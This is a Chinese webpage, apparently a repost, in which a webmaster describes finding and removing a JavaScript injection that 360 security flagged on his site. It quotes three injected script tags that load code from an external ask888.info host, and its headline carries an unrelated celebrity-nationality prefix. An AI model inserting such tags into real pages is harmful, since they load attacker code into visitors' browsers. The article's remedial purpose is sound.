高晓松哪国国籍:站长畅谈 网站js挂马解决办法
来源:百度文库 编辑:九乡新闻网 时间:2024/05/02 05:05:25
前段时间我打开我的网站无意间360冒出一个网站被挂马的提示,当时我就慌了,我的网站已经安全稳定的运行了好几年了,怎么可能被360提示挂马呢? 肯定是360误报了把,宁可信其有不可信其无。下面我就跟大家说说我的解决办法。 恶意代码如下: <script language=javascript src=http://ad.ask888.info/u.js> <script language=javascript src=http://pic.ask888.info/1.htm?user=id1> <script language=javascript src=http://pic.ask888.info/b6.htm?bbs=123> 360安全提示如下图: 登陆服务器打开这个目录的网站程序代码一个一个的查看,查了有N遍就是没有找到这个木马代码,我又开始怀疑是服务器的IIS出了问题,于是查找iis的目录和权限以及文件,也是没有找到这个代码。没办法我就在网上瞎看文章和教程,一边看一边操作,反正就是瞎折腾,搞了N次还是不行,实在没有办法了,我就把网站的目录权限设置成了只读权限,挂马代码这才消失,我稍微喘了口气,于是继续找问题,到底是哪里出了问题啊!!找了好几天还是不行,只要把网站的目录权限设置成只读就没事,权限一改立马就出现了挂马代码。 此路不通另有通,不能死磕在一条路上啊。于是请教了好几个朋友问问他们遇到这样的情况是怎样解决的,他们说这是js挂马说是挺厉害,一般都是网站程序有漏洞才会被挂的,要检查自己的程序代码看看有没有恶意的木马代码,说起代码我就头疼,那么多的代码我一个个的查,得查到何年何月啊!我心思着肯定有工具检查的,于是用sine安全工具检测了我的网站程序代码,检测了好长时间,皇天不负有心人终于查到了木马代码,在一个inc文件里,找到后清除后,我又把网站安全的备份了一遍以防万一。登陆服务器把程序重新上传了一遍,再打开自己的网站,网站挂马提示没有了,我的这个心呐,终于放下来了。 通过这几天的摸索,我总结了一下,遇到挂马千万不要慌,一定要静!多打听,多搜索!方能解决问题。对了还有一点就是有的网站被挂马会被360和百度挂马提示。一般解决问题后自然会去除,没有去除的话,就去百度和360投诉中心投诉一下即可解决。